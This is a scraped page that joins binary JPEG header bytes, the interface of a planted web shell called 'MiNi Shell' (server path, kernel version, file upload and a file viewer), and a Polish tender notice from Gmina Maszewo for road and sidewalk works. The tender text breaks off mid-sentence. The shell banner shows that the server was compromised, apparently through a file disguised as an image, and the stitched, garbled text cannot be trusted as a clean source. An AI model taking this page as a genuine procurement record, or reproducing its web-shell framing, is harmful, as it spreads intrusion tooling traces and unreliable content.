JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240603/0034738201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi w miejscowości Mieszkowo – II etap oraz budowa chodnika w miejscowości Radzanek wraz z opracowaniem dokumentacji projektowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Maszewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684284</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Wolności</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Maszewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@maszewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.maszewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi w miejscowości Mieszkowo – II etap oraz budowa chodnika w miejscowości Radzanek wraz z opracowaniem dokumentacji projektowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-57b7352c-211c-11ef-a500-1a0072d5d2bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00347382</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00006786/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi w miejscowości Mieszkowo-II etap oraz budowa chodnika w miejscowości Radzanek wraz z opracowaniem dokumentacji projektowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://maszewo.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://maszewo.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>	zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0 lub Google Chrome wersji 71.0.3 lub Firefox od wersji 65.0.1 lub Safari od wersji 12.0.2,<br/>	włączona obsługa JavaScript;<br/>	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf;<br/>	dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: pdf., excel., doc., zip.<br/>	zainstalowana wtyczka flash - flash player - dotyczy kupca <br/>	obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax <br/>	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zawarto w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.02.2024.MG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje zaprojektowanie, uzyskanie zezwolenia na realizację inwestycji oraz wykonanie zadania polegającego przebudowie drogi w miejscowości Mieszkowo- II etap.<br/>Zakres zamierzenia budowlanego obejmuje wykonanie drogi o nawierzchni asfaltowej w miejscowości Mieszkowo wraz z włączeniem do drogi wojewódzkiej nr 106 i kanalizacją teletechniczną w ciągu drogi objętej przebudową. <br/>Droga zlokalizowana jest częściowo poza obszarem zabudowanym, lecz tereny przyległe stanowią głównie obszary przeznaczone pod zabudowę w związku z tym należy przyjąć parametry, jak dla ulicy.<br/>Długość drogi objętej przebudową wynosi około 946 m. Kanalizacja teletechniczna 2xHDPE110 o długości 991 m, wraz ze studniami kablowymi typu SKR-1 – 13 kpl.<br/>Pas drogowy jest nieoświetlony o szerokości o szerokości od 9,7 m do 14 m. Uzbrojenie podziemne stanowi linia teletechniczna. <br/>Obecnie droga do miejscowości Mieszkowo posiada jezdnie o nawierzchni asfaltowej i szerokości od 5,0 m do 5,4 m.<br/>Nawierzchnia drogi jest w złym stanie technicznym. Liczne zaniżenia, ubytki w nawierzchni, zawyżone pobocza oraz brak odpowiedniego spadku poprzecznego powoduje akumulację wód opadowych i roztopowych w jezdni. Natężenie ruchu jest małe związane z dojazdem do posesji w miejscowości Mieszkowo i dalej w kierunku gruntów rolnych.<br/>Wymagane parametry techniczne <br/>	Jezdnia ulicy o szerokości 5,5 m o nawierzchni asfaltowej – KR2; <br/>	Kanał technologiczny wzdłuż przebudowywanej drogi; <br/>	Wlot skrzyżowania z drogą wojewódzką o nawierzchni asfaltowej - KR3; <br/>	Dowiązanie chodnika do wlotu przy skrzyżowaniu z DW106; <br/>	Zagospodarowanie wód opadowych w pasie drogowym <br/> Nawierzchnia jezdni 5335 m²	<br/> NNawierzchnia chodników 29 m²	<br/>	Kanały technologiczne 982 mb<br/>Zakres robót przygotowawczych obejmuje: <br/>	oznakowanie robót zgodnie z zatwierdzoną tymczasową organizacją ruchu, <br/>	usunięcie kolidujących drzew i krzewów, <br/>	rozbiórka istniejących nawierzchni utwardzonych <br/>Założenia do projektowania <br/>	klasa drogi gminnej L <br/>	kategoria ruchu KR2 (KR3 na skrzyżowaniu z DW106) <br/>	prędkość projektowa 40 km/h <br/>	nawierzchnia drogi asfaltowa o szerokości 5,5 m, <br/>	pobocza utwardzone, obustronne o szer. 0,75 m, <br/>	spadek poprzeczny jezdni – 2%, <br/>	spadki podłużne: 0,3 do 6,0%, <br/>	odwodnienie powierzchniowe na tereny zielone w granicach pasa drogowego <br/>Odwodnienie <br/> Odwodnienie powierzchniowe na tereny zielone pasa drogowego.<br/>Kanalizacja teletechniczna <br/>Planuje się budowę kablowej kanalizacji teletechnicznej z rur 2xHDPE 110 wraz ze studniami kablowymi typu SKR-1. <br/>Odcinki na poboczu drogi (teren zielony, chodniki, ścieżki rowerowe) wykonać z rur karbowanych o sztywności obwodowej 5 kN i odporności na ściskanie N250 (np. typu DVR 110 lub RHDPEk-F110 lub równoważnych), a przejścia przez drogi i wjazdy z rur karbowanych o sztywności obwodowej minimum 9 kN i odporności na ściskanie minimum N450 (np. DVK 110 lub RHDPEk-S 110 lub równoważne). <br/>Organizacja ruchu na czas trwania budowy <br/>Opracować projekt organizacji ruchu na czas trwania budowy, dla którego należy uzyskać opinie właściwego komendanta wojewódzkiego Policji oraz uzyskać zatwierdzenie czasowej organizacji ruchu w Zachodniopomorskim Zarządzie Dróg Wojewódzkich w Koszalinie. <br/>Stała organizacja ruchu <br/> Opracować projekt stałej organizacji ruchu, który zostanie wprowadzony do realizacji po wykonaniu przebudowy drogi. W projekcie należy przewidzieć przestawienie istniejących znaków pionowych w związku z przesunięciem wlotu skrzyżowania z drogą wojewódzką nr 106. Należy odtworzyć istniejące oznakowanie poziome na wlocie drogi do drogi wojewódzkiej nr 106 w postaci linii P-13 i P-4 i skorygować oznakowanie poziome na drodze wojewódzkiej nr 106.<br/>UWAGA :<br/> W obszarze inwestycji zlokalizowane jest stanowisko archeologiczne nr Maszewo, stan. 43(AZP: 29-10/46) ujęte w wojewódzkiej ewidencji zabytków. Przed przystąpieniem do robót budowlanych należy wystąpić z wnioskiem do Wojewódzkiego Konserwatora Zabytków o określenie zakresu i rodzaju niezbędnych badań archeologicznych zawierający informacje niezbędne do określenia zakresu niezbędnych badań archeologicznych (m in. Głębokość ingerencji w grunt). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zaprojektowanie i uzyskanie zezwolenia na realizację inwestycji oraz wykonanie zadania polegającego na budowie chodnika o nawierzchni z kostki betonowej wzdłuż drogi w miejscowości Radzanek. Długość chodnika wynosi około 934 m. <br/>Ponadto zamówienie obejmuje również :<br/>	przebudowę istniejącej linii telekomunikacyjnej napowietrznej kolidującej z projektowanym chodnikiem w m. Radzanek. Zakres przebudowy linii telekomunikacyjnej obejmuje: ustawienie słupów o wysokości 7m - 6 szt. i przełożenie kabla wiszącego 360 m,<br/>	przebudowę wodociągu wraz z przyłączami i likwidacją lub unieczynnieniem istniejącej infrastruktury. Długość przebudowy wodociągu wynosi około 520 m.<br/>Obecnie droga w miejscowości Radzanek posiada jezdnię o nawierzchni asfaltowej i szerokości 5,7-6,0 m. Pas drogowy jest oświetlony o szerokości od 8,5 m do 14 m. <br/>Nawierzchnia drogi jest w dostatecznym stanie technicznym. Jezdnia jest odwadniana powierzchniowo na tereny zielone. Istniejące obniżenie jezdni względem przyległego terenu oraz zawyżone pobocza utrudniają spływ wód opadowych. Natężenie ruchu jest małe związane z dojazdem do posesji w miejscowości Radzanek oraz innych okolicznych miejscowości.<br/>W skład infrastruktury podziemnej wchodzi sieć wodociągowa oraz linie energetyczne. Infrastrukturę techniczną stanowi ponadto napowietrzna linia energetyczna oraz linia teletechniczna.<br/>Drzewa kolidujące z trasą układu drogowego należy przewidzieć od wycinki. W przypadku konieczności wycinki po uzgodnieniu z Zamawiającym należy uzyskać wszystkie wymagane zezwolenia na wycinkę.<br/>Zakres robót przygotowawczych obejmuje: <br/>	oznakowanie robót zgodnie z zatwierdzoną tymczasową organizacją ruchu, <br/>	usunięcie kolidujących drzew i krzewów, <br/>	rozbiórka istniejących nawierzchni utwardzonych. <br/>Założenia do projektowania <br/>	szerokość chodnika: 1,8-2,0 m (dopuszczalne lokalne przewężenia do 1,0 m),<br/>	nawierzchnia chodnika z kostki betonowej,<br/>	pochylenie poprzeczne jednostronne o wartości 2%,<br/>	pochylenie podłużne zgodnie z pochyleniem podłużnym jezdni drogi powiatowej,<br/>	odwodnienie powierzchniowe na tereny zielone w granicach pasa drogowego,<br/>	ściany oporowe w wybranej technologii (zalecane ściany oporowe z gabionów),<br/>	zagospodarowanie wód opadowych w pasie drogowym poprzez akumulację wód opadowych z odwodnienia powierzchniowego przez dreny francuskie lub ściany oporowe z gabionów,<br/>	przedłużenie przepustu,<br/>	wykonanie krawężników najazdowych wtopionych na zjazdach indywidulanych wraz z zastosowaniem wzmocnionej podbudowy chodnika. Lokalizację i ilość zjazdów indywidualnych należy uzgodnić na etapie projektowania,<br/>	przebudowa kolidującej napowietrznej linii teletechnicznej,<br/>	przebudowa wodociągu.<br/> Nawierzchnia chodnika 1605 m2 <br/>Ściany oporowe 161 mb <br/> Odtworzenie nawierzchni asfaltowych po wykonaniu instalacji podziemnych 792 m2<br/>Odtworzenie nawierzchni asfaltowych na połączeniu z chodnikiem 186 m2	<br/> Kolizje z linią teletechniczną 6 słupów i 360 m kabla 360 mb	<br/> Przebudowa sieci wodociągowej wraz z przyłączami 520 mb	<br/>Nawierzchnie :<br/>Konstrukcja chodnika <br/>	Kostka betonowa grubość 8 cm <br/>	Podsypka cementowo-piaskowa grubość 3 cm <br/>	Podbudowa z mieszanki niezwiązanej C90/3, frakcji 0/31,5 mm/recykling betonowy 0/63 mm lub 0/31,5 mm grubość 15 cm <br/>	Istniejące, zagęszczone, podłoże gruntowe <br/>Konstrukcja chodnika w miejscu zjazdu <br/>	kostka betonowa grubość 8 cm <br/>	Podsypka cementowo-piaskowa grubość 3 cm <br/>	Podbudowa z mieszanki niezwiązanej C90/3, frakcji 0/31,5 mm/recykling betonowy 0/63 mm lub 0/31,5 mm grubość 20 cm<br/>Ściany oporowe <br/>Z uwagi na występowanie stromych i wysokich skarp zlokalizowanych na trasie budowanego chodnika należy wykonać konstrukcje oporowe zapewniające stateczność i odpowiednią szerokość na wykonanie chodnika. Zaleca się wykonanie konstrukcji oporowych z koszy gabionowych wypełnionych materiałem kamiennym. Dopuszcza się wykonanie ścian oporowych w innej technologii (np. ściany prefabrykowane typu L) przy zapewnieniu odpowiedniej akumulacyjności wód opadowych np. poprzez zastosowanie drenów francuskich.<br/>Odwodnienie <br/>Należy zaprojektować odwodnienie powierzchniowe na tereny zielone pasa drogowego. W przypadku wystąpienia załomu pionowego wklęsłego jezdni drogi należy wykonać ścieki podchodnikowe umożliwiające odprowadzenie wód opadowych z jezdni na tereny zielone pasa drogowego. W celu zapewnienia akumulacji wód opadowych w obszarach zielonych pasa drogowego konieczne będzie wykonanie drenaży ułatwiających infiltrację wód powierzchniowych. Drenaże należy wykonać z kruszywa jednofrakcyjnego w celu zapewnienia odpowiedniej przepuszczalności i retencji układu. <br/>Kanalizacja teletechniczna <br/>Podstawą opracowania są warunki techniczne ORANGE nr. 2958/TTDSILU/P/2024/BS. <br/>Istniejące linia telekomunikacyjna napowietrzna jest posadowiona w pasie projektowanego chodnika. W celu usunięcia kolizji należy ustawić nowe słupy - 6 szt. Na ostatnich słupach nie kolidujących z chodnikiem wykonać złącza równoległe na kablu. Słupy należy zabezpieczyć szczudłami żelbetowymi typu A. <br/>Przebudowa sieci wodociągowej wraz z przyłączami <br/>Po trasie nowego wodociągu przewiduje się wykonanie nowych przyłączy do granic działek. <br/>Po trasie nowego wodociągu należy wykonać przyłącza poprzez podłączenie istniejących oraz wykonanie nowych dla umożliwienia rozdziału opomiarowania zużycia wody dla poszczególnych nieruchomości. <br/>Istniejące wodociągi i przyłącza należy trwale wyłączyć z eksploatacji poprzez demontaż lub zamulenie, armaturę istniejącą zdemontować i zdać w WOZ Goleniów, unieczynnioną infrastrukturę techniczną należy usunąć z zasobów geodezyjnych. <br/>Na sieci wodociągowej należy zastosować nadziemne hydranty ppoż. DN80 podwójne zabezpieczone przed złamaniem, z wbudowanym odwodnieniem trzonu. Przed hydratami stosować zasuwy odcinające DN80, min 1,0m przed hydrantem. Hydranty na kolanach stopowych. Hydrant należy obsypać żwirem, aby umożliwić odpływ wody pozostałej po jego zamknięciu.<br/>Organizacja ruchu na czas trwania budowy <br/>Należy opracować projekt organizacji ruchu na czas trwania budowy, dla którego należy uzyskać opinie Komendy Powiatowej Policji w Goleniowie oraz uzyskać zatwierdzenie czasowej organizacji ruchu w Zarządzie Dróg Powiatowych w Goleniowie. <br/>Stała organizacja ruchu <br/>Nie wprowadza się zmian w stałej organizacji ruchu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1)	Sytuacji ekonomicznej i finansowej tj. posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej :<br/>a)	składający ofertę na Część Nr 1 w kwocie 1.100.000,00 zł (słownie: jeden miliom sto tysięcy złotych ), <br/>b)	składający ofertę na Część Nr 2 w kwocie 